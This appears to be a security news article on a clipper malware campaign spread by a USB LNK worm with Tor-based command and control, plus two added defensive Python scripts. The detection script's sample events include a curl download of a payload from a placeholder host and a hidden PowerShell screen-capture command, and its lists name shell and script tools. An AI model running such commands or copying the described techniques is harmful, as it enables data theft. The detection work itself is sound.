Ethical Hacking News
Microsoft has unveiled a Windows-based cryptocurrency clipper campaign utilizing USB LNK worm and Tor-based C2, targeting users since February 2026. The malware carries out high-frequency clipboard theft, screenshot exfiltration, and wallet-address substitution, posing significant threats to users' sensitive financial data.
The malicious operation has targeted users since February 2026 using Windows Script Host and ActiveX-driven logic. The malware performs high-frequency clipboard theft, screenshot exfiltration, and wallet-address substitution. The attacks distribute a malicious Windows Shortcut file via USB storage devices to propagate the malware. The worm component ensures propagation to other uncompromised USB drives and deploys scheduled tasks for persistence. The malware uses WScript and ActiveXObject to interact with the operating system and exits if Task Manager is running, to evade detection. It periodically polls a C2 server for instructions while monitoring the clipboard about every 500 milliseconds. Microsoft recommends prioritizing behavioral detections; mitigations include disabling AutoRun/AutoPlay and blocking LNK execution from removable drives.
Microsoft has recently disclosed details of a Windows-based cryptocurrency clipper campaign that has been targeting users since February 2026. This malicious operation relies heavily on the use of Windows Script Host and ActiveX-driven logic to launch a bundled Tor proxy and poll a hidden-service Command-and-Control (C2) server.
The Microsoft Defender Security Research Team conducted an analysis of this campaign, shedding light on its functionality and modus operandi. According to their findings, the clipper malware in question carries out high-frequency clipboard theft, screenshot exfiltration, and wallet-address substitution. This type of malicious software is referred to as a "clipper" because its primary function is to silently monitor a user's clipboard and intercept sensitive data copied into that short-term buffer.
The attacks in question involve distributing a malicious Windows Shortcut (LNK) file via USB storage devices, which triggers a worm component that checks whether the machine is already infected. If it is not, the payload is fetched from a remote server. A second module deployed by this malware harvests and exfiltrates cryptocurrency wallet information.
The LNK payload scans the USB device for common document types such as DOC, XLSX, and PDF; if any are found, it hides them and creates new LNK files with the same file names, carrying arguments that point to the worm component. When an unsuspecting user launches the shortcut thinking they are opening a harmless document, it triggers the execution of the malware.
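The hidden-document-plus-same-named-shortcut pattern described above is something a responder can look for directly when triaging a removable drive. The following is an added example written for this page, not code from Microsoft or from the article; it assumes a directory listing of (file name, hidden flag) pairs, accepts both naming variants a decoy might use ("Invoice.lnk" or "Invoice.pdf.lnk" beside a hidden "Invoice.pdf"), and the sample listing is constructed for illustration.

```python
import os
import stat
from pathlib import PureWindowsPath

# Document types the article says the LNK payload hides and then mimics.
DECOY_DOC_EXTENSIONS = {".doc", ".docx", ".xls", ".xlsx", ".pdf"}


def find_decoy_shortcuts(entries):
    """Flag .lnk files that share a name with a hidden document in the same directory.

    entries: iterable of (file_name, is_hidden) pairs for one directory.
    Returns a sorted list of (shortcut_name, hidden_document_name) pairs.
    """
    hidden_docs = {}  # lower-cased name and stem -> original hidden document name
    shortcuts = []
    for name, is_hidden in entries:
        path = PureWindowsPath(name)
        ext = path.suffix.lower()
        if ext == ".lnk":
            shortcuts.append(name)
        elif is_hidden and ext in DECOY_DOC_EXTENSIONS:
            hidden_docs[name.lower()] = name          # matches "Invoice.pdf.lnk"
            hidden_docs[path.stem.lower()] = name     # matches "Invoice.lnk"

    findings = []
    for lnk in shortcuts:
        base = lnk[:-4]  # strip the ".lnk" suffix
        twin = hidden_docs.get(base.lower()) or hidden_docs.get(
            PureWindowsPath(base).stem.lower()
        )
        if twin is not None:
            findings.append((lnk, twin))
    return sorted(findings)


def list_entries(directory):
    """Build (name, is_hidden) pairs from a real directory, e.g. the root of a USB drive.

    The hidden flag is read from Windows file attributes when available; on other
    platforms a leading dot is treated as hidden so the helper still runs.
    """
    result = []
    with os.scandir(directory) as it:
        for entry in it:
            if not entry.is_file():
                continue
            attrs = getattr(entry.stat(), "st_file_attributes", 0)
            hidden = bool(attrs & stat.FILE_ATTRIBUTE_HIDDEN) or entry.name.startswith(".")
            result.append((entry.name, hidden))
    return result


# Constructed sample listing: two decoy pairs, one harmless shortcut, one visible document.
SAMPLE_LISTING = [
    ("Q1 Budget.xlsx", True),
    ("Q1 Budget.xlsx.lnk", False),
    ("Invoice.pdf", True),
    ("Invoice.lnk", False),
    ("readme.txt", False),
    ("Holiday photos.lnk", False),  # shortcut with no hidden twin: not flagged
    ("Notes.docx", False),          # visible document: not a decoy target
]

if __name__ == "__main__":
    for lnk, doc in find_decoy_shortcuts(SAMPLE_LISTING):
        print(f"decoy shortcut {lnk!r} masks hidden document {doc!r}")
```

To run it against a mounted drive, pass `list_entries(r"E:\")` to `find_decoy_shortcuts`; a non-empty result is a strong signal that the drive has been touched by this kind of LNK worm, and the shortcut's target arguments are the next thing to inspect.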
The worm component ensures propagation to other uncompromised USB drives by deploying scheduled tasks as a form of persistence for both the worm component and the stealer component. The clipper, for its part, uses WScript and ActiveXObject to interact with the operating system, and exits if Task Manager is among the list of actively running processes to evade detection.
In the final stage, the malware launches a renamed Tor binary in a hidden window, generates a unique victim identifier, and registers it with the external server. Once this step is complete, the malware enters a continuous loop, periodically polling the C2 server for instructions while simultaneously monitoring the clipboard about every 500 milliseconds to extract seed phrases and private keys.
It also hijacks cryptocurrency addresses by replacing copied wallet values with attacker-controlled alternatives and uploads screenshots through Tor. If the C2 returns an EVAL response, the malware executes attacker-supplied code at runtime.
To combat this threat, Microsoft has recommended that defenders prioritize behavioral detections over static signatures, specifically looking for PowerShell-based screen capture and the use of WScript, CScript, or related script engines for launching curl, cmd.exe, PowerShell, or unexpected executables. Other mitigations include disabling AutoRun/AutoPlay for all removable media, blocking LNK execution from removable drives via Group Policy Objects (GPOs), restricting unnecessary use of wscript.exe or cscript.exe, and reviewing clipboard-related and screen-capture behaviors on devices handling sensitive financial workflows.
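The behavioral indicators Microsoft lists (a script engine spawning curl, cmd.exe, PowerShell or an unexpected executable, and PowerShell-based screen capture) translate straightforwardly into a process-creation detection rule. The example below is added for this page and is not Microsoft's or the article's code; it assumes process-creation events carrying parent image, image and command line (as Sysmon event ID 1 or similar telemetry provides), uses the .NET `Graphics.CopyFromScreen` API as the screen-capture marker, and the sample events are constructed. The allow-list of expected child processes is an assumption to be tuned per environment.

```python
import re
from dataclasses import dataclass

SCRIPT_ENGINES = {"wscript.exe", "cscript.exe"}
# Children the article calls out as suspicious when spawned by a script engine.
SUSPICIOUS_CHILDREN = {"curl.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}
# Assumption: children a script engine legitimately spawns in this environment.
EXPECTED_CHILDREN = {"conhost.exe"}
# .NET API commonly used for screenshots from PowerShell.
SCREEN_CAPTURE_RE = re.compile(r"CopyFromScreen", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path):
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(event):
    """Return a list of human-readable findings for one process-creation event."""
    findings = []
    parent = basename(event.parent_image)
    child = basename(event.image)
    if parent in SCRIPT_ENGINES:
        if child in SUSPICIOUS_CHILDREN:
            findings.append(f"{parent} launched {child}")
        elif child not in EXPECTED_CHILDREN:
            findings.append(f"{parent} launched unexpected executable {child}")
    if child in {"powershell.exe", "pwsh.exe"} and SCREEN_CAPTURE_RE.search(event.command_line):
        findings.append("powershell screen capture API in command line")
    return findings


def scan_events(events):
    """Run detect() over a batch; returns (index, findings) for events that hit."""
    hits = []
    for i, ev in enumerate(events):
        f = detect(ev)
        if f:
            hits.append((i, f))
    return hits


# Constructed sample telemetry (placeholder paths and hosts, no real indicators).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\curl.exe",
                 "curl.exe -o C:\\Users\\Public\\stage.bin http://placeholder.invalid/"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -c Add-Type -AssemblyName System.Drawing; "
                 "$b = New-Object System.Drawing.Bitmap 1920,1080; "
                 "[System.Drawing.Graphics]::FromImage($b).CopyFromScreen(0,0,0,0,$b.Size)"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
    ProcessEvent(r"C:\Windows\System32\cscript.exe", r"C:\Windows\System32\conhost.exe", "conhost.exe 0x4"),
    ProcessEvent(r"C:\Windows\System32\wscript.exe", r"C:\Users\Public\Libraries\update.exe",
                 "update.exe --quiet"),
]

if __name__ == "__main__":
    for index, findings in scan_events(SAMPLE_EVENTS):
        print(f"event {index}: " + "; ".join(findings))
```

The rule is intentionally parent/child based rather than hash based, which is the point Microsoft makes about preferring behavior over static signatures: renaming the Tor binary or re-obfuscating the script does not change who spawned what.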
Related Information:
https://www.ethicalhackingnews.com/articles/Microsoft-Unveils-Windows-Clipper-Malware-Campaign-Utilizing-USB-LNK-Worm-and-Tor-Based-C2-ehn.shtml
https://thehackernews.com/2026/06/microsoft-details-windows-clipper.html
Published: Thu Jun 18 11:54:25 2026 by llama3.2 3B Q4_K_M